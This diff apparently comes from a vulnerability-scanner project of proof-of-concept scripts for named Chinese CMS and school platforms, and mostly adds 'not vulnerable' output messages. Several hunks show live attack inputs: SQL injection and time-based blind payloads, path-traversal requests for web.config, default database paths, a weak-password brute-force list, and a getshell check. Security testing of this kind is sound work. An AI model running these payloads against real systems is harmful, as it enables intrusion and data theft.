@@ -27,14 +27,18 @@ class ndstar_six_sqli_BaseVerify:
                 "/pub/search/search_video_bc.asp?id=12",
                 "/pub/search/search_video_view.asp?id=3"]
         try:
+            noexist = True
             for turl in urls:
                 vulnurl = self.url + turl + payload
                 req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
                 if r"WtFaBcMicrosoft" in req.text:
                     cprint("[+]存在南大之星信息发布系统DBA SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
+                    noexist = False
+            if noexist:
+                cprint("[-]不存在ndstar_six_sqli漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/nitc/nitc_index_language_id_sqli.py

@@ -25,9 +25,11 @@ class nitc_index_language_id_sqli_BaseVerify:
             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
             if r"81dc9bdb52d04dc20036dbd8313ed05" in req.text:
                 cprint("[+]存在NITC营销系统index.php SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存在nitc_index_language_id_sqli漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/nitc/nitc_suggestwordList_sqli.py

@@ -25,9 +25,11 @@ class nitc_suggestwordList_sqli_BaseVerify:
             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
             if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                 cprint("[+]存在NITC营销系统suggestwordList.php SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存在nitc_suggestwordList_sqli漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/opensns/opensns_index_arearank.py

@@ -27,9 +27,11 @@ class opensns_index_arearank_BaseVerify:
             req2 = requests.get(vulnurl2, headers=headers, timeout=10, verify=False)
             if r"arearank/131000/arealv/2" in req1.text and r"arearank/131000/arealv/2" not in req2.text:
                 cprint("[+]存在opensns index.php 参数arearank注入漏洞...(高危)\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存在opensns_index_arearank漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/opensns/opensns_index_getshell.py

@@ -32,9 +32,11 @@ class opensns_index_getshell_BaseVerify:
             req2 = requests.get(shellurl, headers=headers, timeout=10, verify=False)
             if r"Configuration File (php.ini) Path" in req2.text:
                 cprint("[+]存在opensns index.php 前台getshell漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4)+"\nshell地址: "+shellurl, "red")
+            else:
+                cprint("[-]不存在opensns_index_getshell漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/others/alkawebs_viewnews_sqli.py

@@ -25,9 +25,11 @@ class alkawebs_viewnews_sqli_BaseVerify:
             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
             if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                 cprint("[+]存在Designed by Alkawebs SQL Injection 漏洞...(高危)\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存在alkawebs_viewnews_sqli漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/others/anmai_grghjl_stuNo_sqli.py

@@ -25,9 +25,11 @@ class anmai_grghjl_stuNo_sqli_BaseVerify:
             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
             if r"BBBMicrosoft" in req.text:
                 cprint("[+]存在安脉grghjl.aspx 参数stuNo注入漏洞...(高危)\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存在anmai_grghjl_stuNo_sqli漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/others/anmai_teachingtechnology_sqli.py

@@ -31,16 +31,20 @@ class anmai_teachingtechnology_sqli_BaseVerify:
                 "/teacher/teachingtechnology/ColligationSelect/wonderfulcourseware_P.aspx?id=1",
                 "/teacher/teachingtechnology/Course_Record_P.aspx?id=1"
                 ]
-        for turl in urls:
-            vulnurl = self.url + turl
-            vulnurl = vulnurl + "'+AnD+1=Sys.Fn_varbintohexstr(HashBytes('Md5','1234'))--"
-            try:
+        try:
+            noexist = True
+            for turl in urls:
+                vulnurl = self.url + turl
+                vulnurl = vulnurl + "'+AnD+1=Sys.Fn_varbintohexstr(HashBytes('Md5','1234'))--"
+
                 req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
                 if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                     cprint("[+]存在安脉学生管理系统SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
-
-            except:
-                cprint("[-] "+__file__+"====>连接超时", "cyan")
+                    noexist = False
+            if noexist:
+                cprint("[-]不存在anmai_teachingtechnology_sqli漏洞", "white", "on_grey")
+        except:
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/others/caitong_multi_sleep_sqli.py

@@ -37,15 +37,19 @@ class caitong_multi_sleep_sqli_BaseVerify:
                 "/custom/GroupNewsList.aspx?child=true&groupId=121"]
         payload = "%20AnD%206371=DbMs_PiPe.ReCeIvE_MeSsAgE(11,6)"
         try:
+            noexist = True
             for turl in urls:
                 start_time = time.time()
                 vulnurl = self.url + turl + payload
                 req = requests.get(vulnurl, headers=headers, timeout=20, verify=False)
                 if time.time() - start_time >= 6:
                     cprint("[+]存在一采通电子采购系统时间盲注漏洞...(高危)\tpayload: "+vulnurl, "red")
+                    noexist = False
+            if noexist:
+                cprint("[-]不存在caitong_multi_sleep_sqli漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/others/caitong_multi_sqli.py

@@ -30,14 +30,18 @@ class caitong_multi_sqli_BaseVerify:
                 "/Rat/EBid/ViewClarify.asp?InviteId=11",
                 "/Rat/EBid/AuditForm/AuditForm_ExpertForm.asp?InviteId=11"]
         try:
+            noexist = True
             for turl in urls:
                 vulnurl = self.url + turl + payload
                 req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
                 if req.status_code ==500 and r"AGQMicrosoft" in req.text:
                     cprint("[+]存在北京网达信联电子采购系统注入漏洞...(高危)\tpayload: "+vulnurl, "red")
+                    noexist = False
+            if noexist:
+                cprint("[-]不存在caitong_multi_sqli漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/others/cicro_DownLoad_filedownload.py

@@ -26,9 +26,11 @@ class cicro_DownLoad_filedownload_BaseVerify():
 
             if req.headers["Content-Type"] == "application/xml":
                 cprint("[+]存在时光动态网站平台任意文件下载漏洞...(高危)\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存在cicro_DownLoad_filedownload漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/others/clib_kindaction_fileread.py

@@ -36,9 +36,11 @@ class clib_kindaction_fileread_BaseVerify:
             req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
             if req.status_code == 200 and r"system" in req.text:
                 cprint("[+]存在五车图书管系统kindaction任意文件遍历漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
+            else:
+                cprint("[-]不存在clib_kindaction_fileread漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/others/clib_kinweblistaction_download.py

@@ -26,9 +26,11 @@ class clib_kinweblistaction_download_BaseVerify():
 
             if r"support" in req.text and r"MPEGVideo" in req.text:
                 cprint("[+]存在五车图书管系统任意下载漏洞...(高危)\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存在clib_kinweblistaction_download漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/others/damall_selloffer_sqli.py

@@ -26,9 +26,11 @@ class damall_selloffer_sqli_BaseVerify:
 
             if req.status_code == 500 and r"Microsoft SQL Server" in req.text:
                 cprint("[+]存在damall商城系统SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存在damall_selloffer_sqli漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/others/dkcms_database_disclosure.py

@@ -28,15 +28,20 @@ class dkcms_database_disclosure_BaseVerify:
         payloads = ["/data/dkcm_ssdfhwejkfs.mdb",
                     "/_data/___dkcms_30_free.mdb",
                     "/_data/I^(()UU()H.mdb"]
-        for payload in payloads:
-            vulnurl = self.url + payload
-            try:
+
+        try:
+            noexist = True
+            for payload in payloads:
+                vulnurl = self.url + payload
                 req = requests.head(vulnurl, headers=headers, timeout=10, verify=False)
                 if req.headers["Content-Type"] == "application/x-msaccess":
                     cprint("[+]存在dkcms默认数据库漏洞...(高危)\tpayload: "+vulnurl, "red")
+                    noexist = False
+            if noexist:
+                cprint("[-]不存在dkcms_database_disclosure漏洞", "white", "on_grey")
 
-            except:
-                cprint("[-] "+__file__+"====>连接超时", "cyan")
+        except:
+                cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/others/domino_unauth.py

@@ -23,9 +23,11 @@ class domino_unauth_BaseVerify:
 
             if r"HTTPPassword" in req.text:
                 cprint("[+]存在domino未授权漏洞...(高危)\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存在domino_unauth漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/others/efuture_downloadAct_filedownload.py

@@ -26,9 +26,11 @@ class efuture_downloadAct_filedownload_BaseVerify():
 
             if r"support" in req.text and r"MPEGVideo" in req.text:
                 cprint("[+]存在efuture商业链系统任意文件下载漏洞...(高危)\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存在efuture_downloadAct_filedownload漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/others/eis_menu_left_edit_sqli.py

@@ -31,9 +31,11 @@ class eis_menu_left_edit_sqli_BaseVerify:
             req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
             if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                 cprint("[+]存在蓝凌EIS智慧协同平台menu_left_edit.aspx SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
+            else:
+                cprint("[-]不存在eis_menu_left_edit_sqli漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/others/euse_study_multi_sqli.py

@@ -28,14 +28,18 @@ class euse_study_multi_sqli_BaseVerify:
                     "/NewPortal/download.aspx?fileid=1%27AnD%20Sys.Fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27))>0%20AnD%27%%27=%27%", 
                     "/NewPortal/content_show.aspx?contentid=1%27AnD%20Sys.Fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27))>0%20AnD%27%%27=%27%"]
         try:
+            noexist = True
             for payload in payloads:
                 vulnurl = self.url + payload
                 req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
                 if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                     cprint("[+]存在Euse TMS DBA权限SQL注入...(高危)\tpayload: "+vulnurl, "red")
+                    noexist = False
+            if noexist:
+                cprint("[-]不存在euse_study_multi_sqli漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/others/gevercms_downLoadFile_filedownload.py

@@ -25,9 +25,11 @@ class gevercms_downLoadFile_filedownload_BaseVerify:
             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
             if req.headers["Content-Type"] == "application/xml":
                 cprint("[+]存在金宇恒内容管理系统通用型任意文件下载漏洞...(高危)\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存在gevercms_downLoadFile_filedownload漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/others/gn_consulting_sqli.py

@@ -25,9 +25,11 @@ class gn_consulting_sqli_BaseVerify:
             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
             if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                 cprint("[+]存在GN SQL Injection漏洞...(高危)\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存在gn_consulting_sqli漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/others/gpcsoft_ewebeditor_weak.py

@@ -29,6 +29,7 @@ class gpcsoft_ewebeditor_weak_BaseVerify:
         try:
             sess = requests.Session()
             req1 = sess.post(vulnurl, headers=headers, data=post_data, timeout=10, verify=False)
+            noexist = True
             for payload in ["admin", "123456", "password", "abc123", "1qaz2wsx", "123123", "12345", "aaaaaa", "12345678", "000000"]:
                 post_data2 = {
                     "usr":"admin",
@@ -39,12 +40,16 @@ class gpcsoft_ewebeditor_weak_BaseVerify:
                     if len(req1.text) != len(req2.text):
                         if req2.status_code == 200 and r"ewebeditor" in req2.text.lower():
                             cprint("[+]存在政采eweb编辑器弱口令漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data2), "red")
+                            noexist = False
                             break
 
                 except:
                     pass
+            if noexist:
+                cprint("[-]不存在gpcsoft_ewebeditor_weak漏洞", "white", "on_grey")
+
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 
 if __name__ == "__main__":

cms/others/gxwssb_fileDownloadmodel_download.py

@@ -25,9 +25,11 @@ class gxwssb_fileDownloadmodel_download_BaseVerify:
             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
             if req.headers["Content-Type"] == "application/xml":
                 cprint("[+]存在天津神州助平台通用型任意下载漏洞...(高危)\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存在gxwssb_fileDownloadmodel_download漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/others/haohan_FileDown_filedownload.py

@@ -22,15 +22,19 @@ class haohan_FileDown_filedownload_BaseVerify:
         payloads = ["/IneduPortal/Components/news/FileDown.aspx?OldName=web.config&NewName=../web.config",
                     "/Inedu3In1/Components/news/FileDown.aspx?OldName=web.config&NewName=../../../web.config",
                     "/IneduBlog/Components/news/FileDown.aspx?OldName=web.config&NewName=../../../web.config"]
-        for payload in payloads:
-            try:
+        try:
+            noexist = True
+            for payload in payloads:
                 vulnurl = self.url + payload
                 req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
                 if req.headers["Content-Type"] == "application/xml":
                     cprint("[+]存在皓翰数字化校园平台任意文件下载漏洞...(高危)\tpayload: "+vulnurl, "red")
+                    noexist = False
+            if noexist:
+                cprint("[-]不存在haohan_FileDown_filedownload漏洞", "white", "on_grey")
 
-            except:
-                cprint("[-] "+__file__+"====>连接超时", "cyan")
+        except:
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/others/hezhong_list_id_sqli.py

@@ -25,9 +25,11 @@ class hezhong_list_id_sqli_BaseVerify:
             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
             if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                 cprint("[+]存在合众商道php系统通用注入漏洞...(高危)\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存在hezhong_list_id_sqli漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")